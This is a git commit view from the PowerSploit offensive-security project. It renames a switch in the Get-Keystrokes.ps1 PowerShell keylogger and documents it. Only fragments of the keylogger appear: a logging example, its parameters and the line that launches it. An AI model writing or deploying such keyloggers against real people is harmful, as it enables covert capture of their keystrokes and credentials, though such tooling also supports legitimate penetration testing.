diff options
author | Jesse Davis <jdalton.davis@gmail.com> | 2016-01-13 21:02:50 -0600 |
---|---|---|
committer | Jesse Davis <jdalton.davis@gmail.com> | 2016-01-13 21:02:50 -0600 |
commit | 759bd481ae57e450fd6fb371690014e67411ac98 (patch) | |
tree | f5bd5f7e0575758ab9c9f9700d9ce56a2ef6713e /Exfiltration | |
parent | f66e219bd633bfcab96b5f34bfcaf86d3984faaf (diff) | |
download | PowerSploit-759bd481ae57e450fd6fb371690014e67411ac98.tar.gz PowerSploit-759bd481ae57e450fd6fb371690014e67411ac98.zip |
Fixed Pester/PassThru
Diffstat (limited to 'Exfiltration')
-rw-r--r-- | Exfiltration/Get-Keystrokes.ps1 | 8 |
1 files changed, 6 insertions, 2 deletions
diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1 index d78f9c2..3a7d1dc 100644 --- a/Exfiltration/Get-Keystrokes.ps1 +++ b/Exfiltration/Get-Keystrokes.ps1 @@ -19,6 +19,10 @@ function Get-Keystrokes { Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. +.PARAMETER PassThru + + Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. + .EXAMPLE Get-Keystrokes -LogPath C:\key.log @@ -43,7 +47,7 @@ function Get-Keystrokes { [Double]$Timeout, [Parameter()] - [Switch]$Return + [Switch]$PassThru ) $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) @@ -368,5 +372,5 @@ function Get-Keystrokes { # Start KeyLogger [void]$PowerShell.BeginInvoke() - if ($Return.IsPresent) { return $PowerShell } + if ($PassThru.IsPresent) { return $PowerShell } }
\ No newline at end of file |